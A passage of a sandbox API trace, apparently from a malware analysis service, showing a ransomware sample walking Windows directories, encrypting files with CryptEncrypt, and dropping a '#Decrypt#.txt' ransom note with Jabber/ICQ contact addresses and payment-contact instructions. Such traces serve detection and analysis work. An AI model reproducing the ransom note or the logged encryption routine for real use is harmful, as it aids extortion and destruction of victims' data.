pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 66 [0229.139] StrStrIW (lpFirst="Content.xml", lpSrch=".horseleader") returned 0x0 [0229.139] lstrcmpW (lpString1="Content.xml", lpString2="#Decrypt#.txt") returned 1 [0229.139] lstrcmpW (lpString1="Content.xml", lpString2="_uninstalling_.png") returned 1 [0229.139] lstrlenW (lpString=".testttjffg") returned 11 [0229.139] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpSrch=".testttjffg") returned 0x0 [0229.139] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0229.139] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0229.139] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0229.140] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c92176b, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c92176b, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xdd6ec0f0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x2f200, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ConvertInkStore.exe", cAlternateFileName="")) returned 1 [0229.140] lstrcmpiW (lpString1="ConvertInkStore.exe", lpString2="Windows") returned -1 [0229.140] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 74 [0229.140] StrStrIW (lpFirst="ConvertInkStore.exe", lpSrch=".horseleader") returned 0x0 [0229.140] lstrcmpW (lpString1="ConvertInkStore.exe", lpString2="#Decrypt#.txt") returned 1 [0229.140] lstrcmpW (lpString1="ConvertInkStore.exe", lpString2="_uninstalling_.png") returned 1 [0229.140] lstrlenW (lpString=".testttjffg") returned 11 [0229.140] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe", lpSrch=".testttjffg") returned 0x0 [0229.140] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0229.140] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0229.140] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0229.141] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0229.141] lstrcmpiW (lpString1="cs-CZ", lpString2="Windows") returned -1 [0229.141] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ") returned 60 [0229.141] lstrcmpW (lpString1="cs-CZ", lpString2=".") returned 1 [0229.141] lstrcmpW (lpString1="cs-CZ", lpString2="..") returned 1 [0229.141] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0229.141] GetProcessHeap () returned 0x780000 [0229.141] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0229.141] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*") returned 62 [0229.141] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0229.142] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0229.142] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\.") returned 62 [0229.142] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0229.142] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0229.142] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0229.142] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\..") returned 63 [0229.142] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0229.142] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0229.142] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6ce8929, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe6f23d9c, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe6f23d9c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0229.142] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0229.142] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 76 [0229.143] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0229.143] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0229.143] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0229.143] lstrlenW (lpString=".testttjffg") returned 11 [0229.143] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0229.143] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0229.347] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0229.347] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0229.347] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6ce8929, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe6f23d9c, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe6f23d9c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0229.347] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0229.348] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\#Decrypt#.txt") returned 74 [0229.348] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0229.348] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0229.348] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0229.349] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0229.349] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0229.350] CloseHandle (hObject=0x158) returned 1 [0229.350] GetProcessHeap () returned 0x780000 [0229.350] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0229.350] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="da-DK", cAlternateFileName="")) returned 1 [0229.350] lstrcmpiW (lpString1="da-DK", lpString2="Windows") returned -1 [0229.350] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK") returned 60 [0229.350] lstrcmpW (lpString1="da-DK", lpString2=".") returned 1 [0229.350] lstrcmpW (lpString1="da-DK", lpString2="..") returned 1 [0229.350] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0229.350] GetProcessHeap () returned 0x780000 [0229.350] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0229.350] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*") returned 62 [0229.350] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0229.351] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0229.351] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\.") returned 62 [0229.351] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0229.351] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0229.351] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0229.351] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\..") returned 63 [0229.351] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0229.351] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0229.351] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6fbc310, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe71ab4c9, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe71d1626, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0229.351] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0229.351] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 76 [0229.351] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0229.351] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0229.351] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0229.351] lstrlenW (lpString=".testttjffg") returned 11 [0229.351] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0229.351] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0229.352] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0229.352] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0229.352] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6fbc310, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe71ab4c9, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe71d1626, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0229.352] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0229.352] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\#Decrypt#.txt") returned 74 [0229.352] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0229.353] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0229.353] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0229.354] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0229.354] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0229.354] CloseHandle (hObject=0x158) returned 1 [0229.354] GetProcessHeap () returned 0x780000 [0229.354] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0229.354] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="de-DE", cAlternateFileName="")) returned 1 [0229.354] lstrcmpiW (lpString1="de-DE", lpString2="Windows") returned -1 [0229.354] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE") returned 60 [0229.354] lstrcmpW (lpString1="de-DE", lpString2=".") returned 1 [0229.354] lstrcmpW (lpString1="de-DE", lpString2="..") returned 1 [0229.354] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0229.354] GetProcessHeap () returned 0x780000 [0229.354] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0229.354] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, 